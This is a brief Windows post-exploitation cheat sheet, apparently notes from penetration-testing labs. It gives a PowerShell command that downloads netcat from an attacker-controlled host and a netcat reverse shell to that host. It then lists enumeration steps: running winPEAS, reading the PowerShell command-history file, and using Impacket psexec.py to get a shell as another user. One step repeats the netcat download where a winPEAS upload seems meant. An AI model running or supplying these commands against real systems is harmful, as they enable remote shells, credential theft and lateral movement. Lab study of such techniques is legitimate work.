Windows

Reverse shell:

  1. Download : nc64.exe powershell -c wget http://10.10.15.101:8000/nc64.exe -outfile nc64.exe
  2. Execute the revshell: .\nc64.exe -e cmd.exe 10.10.15.101 9001

Vulnerability discover:

  1. Download winpeas
  2. Upload on the server powershell -c wget http://10.10.15.101:8000/nc64.exe -outfile nc64.exe
  3. Read a file with the file <file_path> command
  4. Get the command history in C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
  5. psexec.py from Impacket to execute a shell (like SSH) as a certain user.